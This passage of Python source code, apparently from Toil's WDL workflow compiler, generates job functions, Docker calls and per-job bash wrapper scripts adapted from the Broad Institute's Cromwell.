self.get_docker_image(job_task_reference)\n\n dockercall = self.write_function_dockercall(job_task_reference,\n docker_image)\n fn_section = fn_section + dockercall\n\n # write the outputs for the definition to return\n return_outputs = self.write_function_outputreturn(job,\n job_task_reference)\n fn_section = fn_section + return_outputs\n\n return fn_section\n\n def write_function_header(self, job, job_declaration_array):\n '''\n Writes the header that starts each function, for example, this function\n can write and return:\n\n 'def write_function_header(self, job, job_declaration_array):'\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :param job_declaration_array: A list of all inputs that job requires.\n :return: A string representing this.\n '''\n job_alias = job[3]\n\n fn_section = ''\n\n fn_section = fn_section + '\\n\\ndef ' + job_alias + '(job, '\n for job_declaration in job_declaration_array:\n job_declaration_name = job_declaration[0]\n fn_section = fn_section + job_declaration_name + ', '\n fn_section = fn_section[:-2]\n fn_section = fn_section + '):\\n'\n\n return fn_section\n\n def write_function_readglobalfiles(self, job, job_declaration_array):\n '''\n Writes all job.fileStore.readGlobalFile() declarations needed to get\n files from the job store.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :param job_declaration_array: A list of all inputs that job requires.\n :return: A string representing this.\n '''\n fn_section = ''\n for job_declaration in job_declaration_array:\n job_declaration_name = job_declaration[0]\n job_declaration_type = job_declaration[1]\n job_declaration_key = None\n if job_declaration_type == 'File':\n job_declaration_key, parent_job = self.if_output_mk_a_key(job,\n job_declaration_name)\n jobdecl_dict = {\"job_declaration_name\": 
job_declaration_name,\n \"job_declaration_key\": job_declaration_key}\n if job_declaration_key:\n jobdecl = heredoc_wdl('''\n try:\n {job_declaration_name}_fs = job.fileStore.readGlobalFile({job_declaration_name}[\"{job_declaration_key}\"][0], userPath=os.path.join(tempDir, {job_declaration_name}[\"{job_declaration_key}\"][1]))\n except:\n {job_declaration_name}_fs = os.path.join(tempDir, {job_declaration_name}[\"{job_declaration_key}\"][1])\n\n ''', jobdecl_dict, indent=' ')\n else:\n jobdecl = heredoc_wdl('''\n try:\n {job_declaration_name}_fs = job.fileStore.readGlobalFile({job_declaration_name}[0], userPath=os.path.join(tempDir, {job_declaration_name}[1]))\n except:\n {job_declaration_name}_fs = os.path.join(tempDir, {job_declaration_name}[1])\n\n ''', jobdecl_dict, indent=' ')\n fn_section = fn_section + jobdecl\n if job_declaration_type == 'ArrayFile':\n # these are handled in write_function_cmdvarprep()\n pass\n\n return fn_section\n\n def write_function_bashscriptline(self, job_task_reference, job_alias):\n '''\n Writes a function to create a bashscript for injection into the docker\n container.\n\n :param job_task_reference: The job referenced in WDL's Task section.\n :param job_alias: The actual job name to be written.\n :return: A string writing all of this.\n '''\n fn_section = \" generate_docker_bashscript_file(temp_dir=tempDir, docker_dir='/data', globs=[\"\n if self.tasks_dictionary[job_task_reference]['outputs']:\n for output in self.tasks_dictionary[job_task_reference]['outputs']:\n if output[1] in ('ArrayFile', 'File'):\n output_filename = output[2][0]\n fn_section = fn_section + \"'\" + output_filename + \"', \"\n else:\n raise NotImplementedError\n if fn_section.endswith(', '):\n fn_section = fn_section[:-2]\n fn_section = fn_section + \"], cmd=cmd, job_name='\" + str(\n job_alias) + \"')\\n\"\n fn_section = fn_section + '\\n'\n\n return fn_section\n\n def write_function_dockercall(self, job_task_reference, docker_image):\n '''\n Writes a string containing the apiDockerCall() that will run the job.\n\n :param job_task_reference: The name of the job calling docker.\n :param docker_image: The corresponding name of the docker image.\n e.g. 
\"ubuntu:latest\"\n :return: A string containing the apiDockerCall() that will run the job.\n '''\n docker_dict = {\"docker_image\": docker_image,\n \"job_task_reference\": job_task_reference\n }\n docker_template = heredoc_wdl('''\n apiDockerCall(job, \n image=\"{docker_image}\", \n working_dir=tempDir, \n parameters=[\"/data/{job_task_reference}_script.sh\"], \n entrypoint=\"/bin/bash\", \n volumes={{tempDir: {{\"bind\": \"/data\"}}}})\n\n ''', docker_dict, indent=' ')\n\n return docker_template\n\n def write_function_cmdvarprep(self, job, docker=False):\n '''\n Finds ArrayFiles that need to be reformatted, as per sep=' '.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :return: A string containing this.\n '''\n\n fn_section = ''\n job_task_reference = job[2]\n for cmd_name, cmd_type, cmd_actions_dict in \\\n self.tasks_dictionary[job_task_reference]['raw_commandline']:\n for input in self.tasks_dictionary[job_task_reference]['inputs']:\n input_var_name = input[0]\n input_var_type = input[1]\n if cmd_name == input_var_name:\n if input_var_type == 'ArrayFile':\n job_declaration_key, parent_job = self.if_output_mk_a_key(\n job, input_var_name)\n if job_declaration_key:\n called_multiple_times = self.determine_if_called_multitimes(\n parent_job)\n else:\n called_multiple_times = False\n if 'sep' in cmd_actions_dict:\n fn_section = fn_section + \\\n self.write_function_cmdvarprep_arrayfile(\n sep=True,\n sep_var=cmd_actions_dict['sep'],\n docker=docker,\n job_declaration_key=job_declaration_key,\n cmd_name=cmd_name,\n called_multiple_times=called_multiple_times)\n else:\n fn_section = fn_section + \\\n self.write_function_cmdvarprep_arrayfile(\n sep=False,\n sep_var=None,\n docker=docker,\n job_declaration_key=job_declaration_key,\n cmd_name=cmd_name,\n called_multiple_times=called_multiple_times)\n return fn_section\n\n def write_function_cmdvarprep_arrayfile(self,\n sep,\n sep_var,\n docker,\n job_declaration_key,\n cmd_name,\n called_multiple_times):\n '''\n For all Array[File] inputs, there are a couple of recipes to import each\n of the files inside into the toil jobStore properly, and this function\n handles writing those.\n\n :param sep: Whether an array should be concatenated into a large string\n with some separator. Equivalent to ' '.join(filearray).\n :param sep_var: The string separator used to join the array of strings.\n i.e. 
' -V ' for something like ' -V '.join(filearray)\n :param docker: If this is a docker function, in which case the filepaths\n need to begin with the default of '/data'.\n :param job_declaration_key:\n :param cmd_name:\n :return: A string writing all of this.\n '''\n fn_section = ''\n\n if job_declaration_key:\n formatted_key = '[\"' + job_declaration_key + '\"]'\n else:\n formatted_key = ''\n\n if called_multiple_times:\n formatted_key = ''\n multicall_key = '[\"' + job_declaration_key + '\"]'\n else:\n multicall_key = ''\n\n if docker:\n path_appended = '\"/data/\" + i[1]'\n else:\n path_appended = 'j'\n\n if sep:\n fn_section = fn_section + ' ' + cmd_name + '_list = []\\n'\n fn_section = fn_section + ' for i in ' + cmd_name + formatted_key + ':\\n'\n fn_section = fn_section + ' try:\\n'\n fn_section = fn_section + ' j = job.fileStore.readGlobalFile(i' + multicall_key + '[0], userPath=os.path.join(tempDir, i' + multicall_key + '[1]))\\n'\n if sep:\n fn_section = fn_section + ' ' + cmd_name + '_list.append(' + path_appended + ')\\n'\n fn_section = fn_section + ' except:\\n'\n fn_section = fn_section + ' j = os.path.join(tempDir, i' + multicall_key + '[1])\\n'\n if sep:\n fn_section = fn_section + ' ' + cmd_name + '_list.append(' + path_appended + ')\\n'\n fn_section = fn_section + ' ' + cmd_name + '_sep = \"' + str(\n sep_var) + '\".join(' + cmd_name + '_list)\\n\\n'\n return fn_section\n\n def write_function_cmdline(self, job, docker):\n '''\n Write a series of commandline variables to be concatenated together\n eventually and either called with subprocess.Popen() or with\n apiDockerCall() if a docker image is called for.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :return: A string representing this.\n '''\n\n fn_section = ''\n command_var_decl_array = []\n job_task_reference = job[2]\n for cmd in self.tasks_dictionary[job_task_reference]['raw_commandline']:\n cmd_name = cmd[0]\n cmd_type = cmd[1]\n cmd_actions_dict = cmd[2]\n command_var_decl = 'command' + str(self.command_number)\n if cmd_type == 'variable':\n job_declaration_key, parent_job = self.if_output_mk_a_key(job,\n cmd_name)\n if job_declaration_key:\n output_dict_key = '[\"' + job_declaration_key + '\"]'\n else:\n output_dict_key = ''\n for input in self.tasks_dictionary[job_task_reference][\n 'inputs']:\n input_var_name = input[0]\n input_var_type = input[1]\n if cmd_name == input_var_name:\n\n if input_var_type == 'File':\n if docker:\n fn_section = fn_section + ' ' + command_var_decl + ' = \"/data/\" + ' + cmd_name + output_dict_key + '[1]\\n'\n else:\n fn_section = fn_section + ' ' + command_var_decl + ' = ' + cmd_name + '_fs\\n'\n\n elif input_var_type == 'ArrayFile':\n if 'sep' in cmd_actions_dict:\n fn_section = fn_section + ' ' + command_var_decl + ' = ' + cmd_name + '_sep\\n'\n else:\n fn_section = fn_section + ' ' + command_var_decl + ' = ' + cmd_name + '\\n'\n else:\n fn_section = fn_section + ' ' + command_var_decl + ' = ' + cmd_name + '\\n'\n\n if cmd_type == 'normal_string':\n fn_section = fn_section + ' ' + command_var_decl + \" = '''\" + cmd_name + \"'''\\n\"\n self.command_number = self.command_number + 1\n command_var_decl_array.append(command_var_decl)\n\n fn_section = fn_section + '\\n cmd = '\n for command in command_var_decl_array:\n fn_section = fn_section + command + ' + '\n if fn_section.endswith(' + '):\n fn_section = fn_section[:-3]\n fn_section = fn_section + '\\n\\n'\n\n return fn_section\n\n def write_function_subprocesspopen(self, job):\n '''\n 
Write a subprocess.Popen() call for this function and write it out as a\n string.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :return: A string representing this.\n '''\n fn_section = heredoc_wdl('''\n this_process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n this_process.communicate()\n ''', indent=' ')\n\n return fn_section\n\n def write_function_outputreturn(self, job, job_task_reference):\n '''\n Find the output values that this function needs and write them out as a\n string.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :param job_task_reference: The name of the job to look up values for.\n :return: A string representing this.\n '''\n\n fn_section = ''\n if 'outputs' in self.tasks_dictionary[job_task_reference]:\n files_to_return = []\n glob = False\n for output in self.tasks_dictionary[job_task_reference]['outputs']:\n output_name = output[0]\n output_type = output[1]\n output_value = output[2]\n output_action_dict = output[3]\n\n if output_value != '':\n if 'index_lookup' in output_action_dict:\n suffix = '_il'\n else:\n suffix = ''\n\n if 'glob' in output_action_dict:\n\n glob_dict = {\n \"output_name\": output_name,\n \"suffix\": suffix,\n \"out_value\": output_value[0],\n \"out_dir\": self.output_directory}\n glob_template = heredoc_wdl('''\n {output_name}{suffix} = []\n for x in recursive_glob(job, directoryname=tempDir, glob_pattern=\"{out_value}\"):\n output_file = job.fileStore.writeGlobalFile(x)\n output_filename = os.path.basename(x)\n job.fileStore.exportFile(output_file, \"file://{out_dir}/\" + output_filename)\n {output_name}{suffix}.append((output_file, output_filename))\n\n ''', glob_dict, indent=' ')\n fn_section = fn_section + glob_template\n\n if 'index_lookup' in output_action_dict:\n index_dict = {\n \"output_name\": output_name,\n \"suffix\": suffix,\n \"index_num\": str(\n output_action_dict['index_lookup'])}\n index_template = heredoc_wdl('''\n {output_name} = {output_name}{suffix}[{index_num}]\n ''', index_dict, indent=' ')\n # heredoc_wdl() has already formatted the template\n fn_section = fn_section + index_template\n\n else:\n fn_section = fn_section + '\\n'\n files_to_return.append(output_name)\n else:\n nonglob_dict = {\n \"formatted_output_filename\": self.translate_wdl_string_to_python_string(\n job, output_value),\n \"output_name\": output_name,\n \"out_dir\": self.output_directory}\n nonglob_template = heredoc_wdl('''\n output_filename = {formatted_output_filename}\n output_file = job.fileStore.writeGlobalFile(output_filename)\n job.fileStore.exportFile(output_file, \"file://{out_dir}/\" + output_filename)\n {output_name} = (output_file, output_filename)\n\n ''', nonglob_dict, indent=' ')\n fn_section = fn_section + nonglob_template\n files_to_return.append(output_name)\n\n if files_to_return:\n fn_section = fn_section + ' rvDict = {'\n for file in files_to_return:\n fn_section = fn_section + '\"' + file + '\": ' + file + ', '\n if fn_section.endswith(', '):\n fn_section = fn_section[:-2]\n if files_to_return:\n fn_section = fn_section + '}\\n\\n'\n\n # only for logging stats\n log_dir = os.path.join(self.output_directory, \"wdl-stats.log\")\n stats_dict = {\"log_dir\": log_dir,\n \"job_name\": job[3]}\n stats_template = heredoc_wdl('''\n end = time.time()\n with open(\"{log_dir}\", \"a+\") as f:\n f.write(str(\"{job_name}\") + \" now being run.\")\n f.write(\"\\\\n\\\\n\")\n f.write(\"Outputs:\\\\n\")\n for rv in rvDict:\n f.write(str(rv) + \": \" + 
str(rvDict[rv]))\n f.write(\"\\\\n\")\n f.write(\"Total runtime: %2.2f sec\" % (end - start))\n f.write(\"\\\\n\\\\n\")\n ''', stats_dict, indent=' ')\n fn_section = fn_section + stats_template\n\n if files_to_return:\n fn_section = fn_section + ' return rvDict\\n\\n'\n\n return fn_section\n\n def if_output_mk_a_key(self, job, job_declaration_name):\n '''\n An input variable for a job may be called \"GVCFs\", but the output that\n generates it may have called it \"gvcf\" and this function fetches that\n output's old name.\n\n This is important because all outputs are packaged as a dictionary of\n outputs, where individual values are extracted using the original output\n name as a key.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :param job_declaration_name: The name of the input to look up values for.\n :return dict_output_key, parent_job: The original output key and the\n parent job that produced it, or (None, None) if the input is not\n another job's output.\n '''\n if job in self.workflows_dictionary:\n for input in self.workflows_dictionary[job]['job_declarations']:\n input_type = \\\n self.workflows_dictionary[job]['job_declarations'][input][\n 'type']\n if input_type == 'output':\n input_name = \\\n self.workflows_dictionary[job]['job_declarations'][input][\n 'name']\n if input == job_declaration_name:\n parent_job = input_name.split()[0]\n dict_output_key = input_name.split()[-1]\n return dict_output_key, parent_job\n return None, None\n\n def get_docker_image(self, job_task_reference):\n '''\n Find the corresponding docker image for writing this job's dockerCall in\n the self.tasks_dictionary's runtime.\n\n :param job_task_reference: Name of the job; used as a key to call the\n task's dictionary.\n :return: The corresponding name of the docker image, e.g. \"ubuntu:latest\"\n '''\n docker_image = None\n if self.tasks_dictionary[job_task_reference]['runtime']:\n for runtime_var in self.tasks_dictionary[job_task_reference]['runtime']:\n if runtime_var[0] == 'docker':\n docker_image = runtime_var[1]\n else:\n raise RuntimeError(\n 'Writing docker function, but no runtime section found.')\n if docker_image is None:\n raise RuntimeError(\n 'Writing docker function, but no docker image in runtime section.')\n return docker_image\n\n def translate_wdl_string_to_python_string(self, job, some_string):\n '''\n Parses a string representing a given job's output filename into something\n python can read. Replaces ${string}'s with normal variables and the rest\n with normal strings all concatenated with ' + '.\n\n Will not work with additional parameters, such as:\n ${default=\"foo\" bar}\n or\n ${true=\"foo\" false=\"bar\" Boolean baz}\n\n This method expects to be passed only strings with some combination of\n \"${abc}\" and \"abc\" blocks.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :param some_string: e.g. '${sampleName}.vcf'\n :return: output_string, e.g. 
'sampleName + \".vcf\"'\n '''\n\n # add support for 'sep'\n output_string = ''\n edited_string = some_string.strip()\n\n if edited_string.find('${') != -1:\n continue_loop = True\n while (continue_loop):\n index_start = edited_string.find('${')\n index_end = edited_string.find('}', index_start)\n\n stringword = edited_string[:index_start]\n\n if index_start != 0:\n output_string = output_string + \"'\" + stringword + \"' + \"\n\n keyword = edited_string[index_start + 2:index_end]\n output_string = output_string + keyword + \" + \"\n\n edited_string = edited_string[index_end + 1:]\n if edited_string.find('${') == -1:\n continue_loop = False\n if edited_string:\n output_string = output_string + \"'\" + edited_string + \"' + \"\n else:\n output_string = \"'\" + edited_string + \"'\"\n\n if output_string.endswith(' + '):\n output_string = output_string[:-3]\n\n return output_string\n\n def return_one_job_per_priority(self):\n '''\n Definitions only need to be declared once, even if they are run multiple\n times, this function returns a list of jobs with these redundant jobs\n removed for this purpose.\n\n :return: job_list_with_redundant_jobs_removed\n '''\n job_list_with_redundant_jobs_removed = []\n for i in range(len(self.workflows_dictionary)):\n for job in self.workflows_dictionary:\n if i == job[0]:\n job_list_with_redundant_jobs_removed.append(job)\n break\n return (job_list_with_redundant_jobs_removed)\n\n def determine_if_docker_job(self, job):\n '''\n Returns True if the job has a docker parameter specified in its Task's\n 'runtime' section.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :return:\n '''\n docker = False\n job_task_reference = job[2] # default name\n if 'runtime' in self.tasks_dictionary[job_task_reference]:\n for runtime_var in self.tasks_dictionary[job_task_reference][\n 'runtime']:\n if runtime_var[0] == 'docker':\n docker = True\n return docker\n\n def mk_ordered_dict_of_all_job_input_params(self):\n '''\n Gets all of the info necessary to write the the toil job wrapping\n declarations with all appropriate variables.\n\n :return: an ordered dictionary. 
Example:\n\n OrderedDict(\n [('job1', ['mapping', 'files=fastqs', 'reference_file=reference']),\n ('job2', ['process', 'i=fastqs', 'r=reference', 'sai=job1.rv()'])])\n '''\n job_dict = {}\n\n sort_these_jobs = []\n for job_map in self.workflows_dictionary:\n if isinstance(job_map, (list, tuple)):\n sort_these_jobs.append(job_map)\n sorted_jobs = sorted(sort_these_jobs)\n\n i = 1\n for job in sorted_jobs:\n job_reference = job[2]\n job_alias = job[3]\n job_name = 'job' + str(i)\n declaration_array = [job_alias]\n for task_declaration in self.tasks_dictionary[job_reference][\n 'inputs']:\n task_var_name = task_declaration[0]\n mapped_var = self.map_to_final_var(job, task_var_name)\n declaration_array.append(task_var_name + '=' + mapped_var)\n job_dict[job_name] = declaration_array\n i = i + 1\n # sort numerically on the job number so 'job10' follows 'job2'\n ordered_job_dict = collections.OrderedDict(sorted(job_dict.items(),\n key=lambda t: int(t[0][3:])))\n return ordered_job_dict\n\n def map_to_final_var(self, job, task_var_name):\n '''\n Typically takes a task variable, and if it is assigned to a new variable\n in the workflow, it will return the new workflow replacement,\n otherwise it just returns the same variable back.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :param task_var_name: The variable name that needs to be mapped.\n :return mapped_var: The input needed for this job for the original\n declared variable.\n '''\n mapped_var = ' '\n for wf_declaration in self.workflows_dictionary[job][\n 'job_declarations']:\n if task_var_name == wf_declaration:\n wf_declaration_type = \\\n self.workflows_dictionary[job]['job_declarations'][\n wf_declaration]['type']\n wf_declaration_name = \\\n self.workflows_dictionary[job]['job_declarations'][\n wf_declaration]['name']\n mapped_var = self.map_to_final_var_type(wf_declaration_name,\n wf_declaration_type)\n if mapped_var == ' ':\n return task_var_name\n else:\n return mapped_var\n\n def map_to_final_var_type(self, declaration_name, declaration_type):\n '''\n Identifies workflow variable type, and if anything other than another\n variable name, modifies the file based on its type accordingly.\n\n :param declaration_name: A variable name, like x.\n :param declaration_type: Example types are:\n\n 'identifier':\n wv --> wv\n 'index_value':\n wv --> wv[0][1]\n 'string':\n wv --> 'wv'\n 'output':\n wv --> job1.rv()\n OR\n wv --> [job1.rv(), job2.rv(), job3.rv()]\n\n :return declaration_name: Modified by type as appropriate above.\n '''\n if declaration_type == 'identifier':\n return declaration_name\n elif declaration_type == 'index_value':\n potential_scatter_item = declaration_name.split('[')[0]\n for collection in self.workflows_dictionary['scatter_calls']:\n scatter_item = self.workflows_dictionary['scatter_calls'][\n collection]\n if scatter_item == potential_scatter_item:\n old_index = declaration_name[len(potential_scatter_item):]\n return collection + old_index\n elif declaration_type == 'string':\n return \"'\" + declaration_name + \"'\"\n elif declaration_type == 'output':\n return_values = []\n job_alias_reference = declaration_name.split()[0]\n for wf in self.workflows_dictionary:\n if isinstance(wf, (list, tuple)):\n wf_alias_reference = wf[3]\n wf_job_num = wf[1]\n if job_alias_reference == wf_alias_reference:\n return_values.append('job' + str(wf_job_num) + '.rv()')\n if len(return_values) == 1:\n declaration_name = return_values[0]\n if len(return_values) > 1:\n declaration_name = '[' + ', '.join(return_values) + ']'\n else:\n raise 
NotImplementedError\n return declaration_name\n\n def determine_if_called_multitimes(self, parent_job):\n '''\n Returns True if the parent_job (alias) is called more than once during\n the run.\n\n This is helpful and used to determine the following:\n\n If a job is called once, it returns a single dictionary of outputs to be\n input into the next job:\n JobInputs(FnName, A=A, B=B, C=C, D=Job1.rv())\n Where an example of Job1.rv() is:\n Job1.rv() = {'value1': 1, 'value2': 2}\n\n If a job is called more than once though, it returns an array of\n dictionaries:\n JobInputs(FnName, A=A, B=B, C=C, D=[Job1.rv(), Job2.rv()])\n Where examples of Job1.rv() & Job2.rv() are:\n Job1.rv() = {'value1': 1, 'value2': 2}\n Job2.rv() = {'value3': 3, 'value4': 4}\n\n This basically determines if the input file is expected to be an array\n or a dictionary and writes the appropriate function calls.\n\n :param parent_job: e.g. a function def name like \"haplotypeCaller\"\n :return: bool True if called multiple times; False if not.\n '''\n jobs_that_called_this_task = []\n for task in self.workflows_dictionary:\n if isinstance(task, (list, tuple)):\n if parent_job == task[3]:\n jobs_that_called_this_task.append(task)\n\n if len(jobs_that_called_this_task) > 1:\n multiple_calls = True\n else:\n multiple_calls = False\n\n return multiple_calls\n\n def get_job_declarations(self, job):\n '''\n Get the default declaration variable list from the WDL \"task\" skeleton.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :return: declarations_list of variables from the Task 'input' section.\n '''\n job_task_reference = job[2]\n declarations_list = []\n inputs = self.tasks_dictionary[job_task_reference]['inputs']\n for task_input in inputs:\n declarations_list.append((task_input[0], task_input[1]))\n return declarations_list\n\n def write_python_file(self,\n module_section,\n fn_section,\n main_section,\n output_file):\n '''\n Just takes three strings and writes them to output_file.\n\n :param module_section: A string of 'import modules'.\n :param fn_section: A string of python 'def functions()'.\n :param main_section: A string declaring toil options and main's header.\n :param output_file: The file to write the compiled toil script to.\n '''\n with open(output_file, 'w') as file:\n file.write(module_section)\n file.write(fn_section)\n file.write(main_section)\n\n def write_AST(self):\n '''\n Prints an AST to stdout.\n\n Does not work by default with toil since Toil actively suppresses stdout\n during the run.\n '''\n with open('AST.out', 'w') as f:\n with open(self.wdl_file, 'r') as wdl:\n wdl_string = wdl.read()\n ast = wdl_parser.parse(wdl_string).ast()\n f.write(ast.dumps(indent=2))\n\n def write_mappings(self, i):\n '''\n Intended to take a ToilWDL_instance (i) and print the final task dict,\n workflow dict, csv dict, and tsv dict.\n\n Does not work by default with toil since Toil actively suppresses stdout\n during the run.\n\n :param i: A class object instance with the following dict variables:\n self.tasks_dictionary\n self.workflows_dictionary\n self.tsv_dict\n self.csv_dict\n '''\n with open('mappings.out', 'w') as f:\n f.write('\\n\\ntask_dict')\n f.write(str(i.tasks_dictionary))\n for each_task in i.tasks_dictionary:\n f.write(str(each_task))\n if i.tasks_dictionary[each_task]:\n for each_section in i.tasks_dictionary[each_task]:\n f.write(' ' + str(each_section))\n if 
i.tasks_dictionary[each_task][each_section]:\n for each_variable in i.tasks_dictionary[each_task][\n each_section]:\n f.write(' ' + str(each_variable))\n\n f.write('\\n\\nworkflows_dict')\n f.write(str(i.workflows_dictionary))\n for each_task in i.workflows_dictionary:\n f.write(str(each_task))\n if 'wf_declarations' in i.workflows_dictionary[each_task]:\n f.write(' wf_declarations')\n for d in i.workflows_dictionary[each_task][\n 'wf_declarations']:\n f.write(' ' + str(d))\n if 'job_declarations' in i.workflows_dictionary[each_task]:\n f.write(' job_declarations')\n for j in i.workflows_dictionary[each_task][\n 'job_declarations']:\n f.write(' ' + str(j))\n for g in \\\n i.workflows_dictionary[each_task]['job_declarations'][\n j]:\n f.write(' ' + g + ': ' +\n i.workflows_dictionary[each_task][\n 'job_declarations'][j][g])\n\n f.write('\\n\\ntsv_dict')\n for var in i.tsv_dict:\n f.write(str(var))\n f.write(str(i.tsv_dict))\n\n f.write('\\n\\ncsv_dict')\n for var in i.csv_dict:\n f.write(str(var))\n f.write(str(i.csv_dict))\n\n\ndef recursive_glob(job, directoryname, glob_pattern):\n '''\n Walks through a directory and its subdirectories looking for files matching\n the glob_pattern and returns a list of matches.\n\n :param job: A \"job\" object representing the current task node \"job\" being\n passed around by toil. Toil's minimum unit of work.\n :param directoryname: Any accessible folder name on the filesystem.\n :param glob_pattern: A string like \"*.txt\", which would find all text files.\n :return: A list of absolute filepaths matching the glob pattern.\n '''\n matches = []\n for root, dirnames, filenames in os.walk(directoryname):\n for filename in fnmatch.filter(filenames, glob_pattern):\n absolute_filepath = os.path.join(root, filename)\n matches.append(absolute_filepath)\n return matches\n\n\ndef heredoc_wdl(template, dictionary=None, indent=''):\n # avoid a shared mutable default argument\n if dictionary is None:\n dictionary = {}\n template = textwrap.dedent(template).format(**dictionary)\n return template.replace('\\n', '\\n' + indent) + '\\n'\n\ndef generate_docker_bashscript_file(temp_dir, docker_dir, globs, cmd, job_name):\n '''\n Creates a bashscript to inject into a docker container for the job.\n\n This script wraps the job command(s) given in a bash script, hard links the\n outputs and returns an \"rc\" file containing the exit code. All of this is\n done in an effort to parallel the Broad's cromwell engine, which is the\n native WDL runner. As they've chosen to write and then run a bashscript for\n every command, so shall we.\n\n :param temp_dir: The current directory outside of docker to deposit the\n bashscript into, which will be the bind mount that docker\n loads files from into its own containerized filesystem.\n This is usually the tempDir created by this individual job\n using 'tempDir = job.fileStore.getLocalTempDir()'.\n :param docker_dir: The working directory inside of the docker container\n which is bind mounted to 'temp_dir'. 
By default this is\n 'data'.\n :param globs: A list of expected output files to retrieve as glob patterns\n that will be returned as hard links to the current working\n directory.\n :param cmd: A bash command to be written into the bash script and run.\n :param job_name: The job's name, only used to write in a file name\n identifying the script as written for that job.\n Will be used to call the script later.\n :return: Nothing, but it writes and deposits a bash script in temp_dir\n intended to be run inside of a docker container for this job.\n '''\n wdl_copyright = heredoc_wdl('''#!/bin/bash\n \n # Borrowed/rewritten from the Broad's Cromwell implementation. As \n # that is under a BSD-ish license, I include here the license off \n # of their GitHub repo. Thank you Broadies!\n \n # Copyright (c) 2015, Broad Institute, Inc.\n # All rights reserved.\n \n # Redistribution and use in source and binary forms, with or without\n # modification, are permitted provided that the following conditions are met:\n \n # * Redistributions of source code must retain the above copyright notice, this\n # list of conditions and the following disclaimer.\n \n # * Redistributions in binary form must reproduce the above copyright notice,\n # this list of conditions and the following disclaimer in the documentation\n # and/or other materials provided with the distribution.\n \n # * Neither the name Broad Institute, Inc. nor the names of its\n # contributors may be used to endorse or promote products derived from\n # this software without specific prior written permission.\n \n # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE\n \n # make a temp directory w/identifier\n ''')\n prefix_dict = {\"docker_dir\": docker_dir,\n \"cmd\": cmd}\n bashfile_prefix = heredoc_wdl('''\n tmpDir=$(mktemp -d /{docker_dir}/execution/tmp.XXXXXX)\n chmod 777 $tmpDir\n # set destination for java to deposit all of its files\n export _JAVA_OPTIONS=-Djava.io.tmpdir=$tmpDir\n export TMPDIR=$tmpDir\n \n (\n cd /{docker_dir}/execution\n {cmd}\n )\n \n # gather the input command return code\n echo $? 
> \"$tmpDir/rc.tmp\"\n \n ''', prefix_dict)\n\n bashfile_string = wdl_copyright + bashfile_prefix\n\n begin_globbing_string = heredoc_wdl('''\n (\n cd $tmpDir\n mkdir \"$tmpDir/globs\"\n ''')\n\n bashfile_string = bashfile_string + begin_globbing_string\n\n for glob_input in globs:\n add_this_glob = \\\n '( ln -L ' + glob_input + \\\n ' \"$tmpDir/globs\" 2> /dev/null ) || ( ln ' + glob_input + \\\n ' \"$tmpDir/globs\" )\\n'\n bashfile_string = bashfile_string + add_this_glob\n\n bashfile_suffix = heredoc_wdl('''\n )\n \n # flush RAM to disk\n sync\n \n mv \"$tmpDir/rc.tmp\" \"$tmpDir/rc\"\n ''')\n\n bashfile_string = bashfile_string + bashfile_suffix\n\n with open(os.path.join(temp_dir, job_name + '_script.sh'), 'w') as bashfile:\n bashfile.write(bashfile_string)\n\ndef main():\n parser = argparse.ArgumentParser(description='Runs WDL files with toil.')\n parser.add_argument('wdl_file', help='A WDL workflow file.')\n parser.add_argument('secondary_file', help='A secondary data file (json).')\n parser.add_argument('-o',\n '--output_directory',\n required=False,\n default=os.getcwd(),\n help='Optionally specify the directory that outputs '\n 'are written to. Default is the current working dir.')\n parser.add_argument('--gen_parse_files', required=False, default=False,\n help='Creates \"AST.out\", which holds the printed AST and'\n '\"mappings.out\", which holds the printed task, workflow,'\n 'csv, and tsv dictionaries generated by the parser.')\n parser.add_argument('--dont_delete_compiled', required=False, default=False,\n help='Saves the compiled toil script generated from the'\n 'wdl/json files from deletion.')\n\n # wdl_run_args is an array containing all of the unknown arguments not\n # specified by the parser in this main. All of these will be passed down in\n # check_call later to run the compiled toil file.\n args, wdl_run_args = parser.parse_known_args()\n\n wdl_file_path = os.path.abspath(args.wdl_file)\n args.secondary_file = os.path.abspath(args.secondary_file)\n args.output_directory = os.path.abspath(args.output_directory)\n\n w = ToilWDL(wdl_file_path, args.secondary_file, args.output_directory)\n\n # read secondary file; create dictionary to hold variables\n if args.secondary_file.endswith('.json'):\n w.dict_from_JSON(args.secondary_file)\n elif args.secondary_file.endswith('.yml'):\n w.dict_from_YML(args.secondary_file)\n elif args.secondary_file.endswith('.yaml'):\n w.dict_from_YML(args.secondary_file)\n else:\n raise RuntimeError('Unsupported Secondary File Type. Use json.')\n\n # parse 